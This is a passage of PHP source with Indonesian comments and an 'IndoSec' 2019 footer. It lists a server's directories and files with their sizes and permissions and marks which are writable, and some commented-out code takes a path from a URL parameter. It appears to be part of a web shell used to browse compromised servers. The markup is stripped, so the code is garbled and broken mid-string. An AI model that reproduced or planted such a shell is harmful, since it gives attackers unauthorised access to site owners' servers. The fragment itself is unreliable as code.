"; } exit; } /*if (isset($_GET['path'])) { $path = $_GET['path']; chdir($path); } else { $path = getcwd(); } $path = str_replace('\\', '/', $path); */ $dirs = explode('/', $dir); echo '
Path : '; foreach ($dirs as $id=>$pat) { if ($pat == '' && $id == 0) { $a = true; echo '/'; continue; } if ($pat == '') { continue; } echo ''.$pat.'/'; } $scandir = scandir($dir); echo '  [ '.w($dir, perms($dir)).' ]'; echo '

'; foreach ($scandir as $dirb) { /* cek jika ini berbentuk folder */ /* cek jika nama folder karaker terlalu panjang */ if (strlen($dirb) > 18) { $_dir = substr($dirb, 0, 18).'...'; } else { $_dir = $dirb; } if (!is_dir($dir.'/'.$dirb) || $dirb == '.' || $dirb == '..') { continue; } echo ' '; } } foreach ($scandir as $file) { /* cek jika ini berbentuk file */ if (!is_file($dir.'/'.$file)) { continue; } $size = filesize($dir.'/'.$file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2).' MB'; } else { $size = $size.' KB'; } echo ''; } } echo '

File/Folder	Size	Permission	Action
'.$_dir.'	--	'; if (is_writable($dir.'/'.$dirb)) { echo ''; } elseif (!is_readable($dir.'/'.$dirb)) { echo ''; } echo perms($dir.'/'.$dirb); if (is_writable($dir.'/'.$dirb) || !is_readable($dir.'/'.$dirb)) { echo '
'; /* cek jika karaker terlalu panjang */ if (strlen($file) > 25) { $_file = substr($file, 0, 25).'...-.'.$ext; } else { $_file = $file; } echo' '.$_file.'	'.$size.'	'; if (is_writable($dir.'/'.$file)) { echo ''; } elseif (!is_readable($dir.'/'.$file)) { echo ''; } echo perms($dir.'/'.$file); if (is_writable($dir.'/'.$file) || !is_readable($dir.'/'.$file)) { echo '

---

Copyright 2019 { IndoSec }
'; echo ""; /* End */ ?>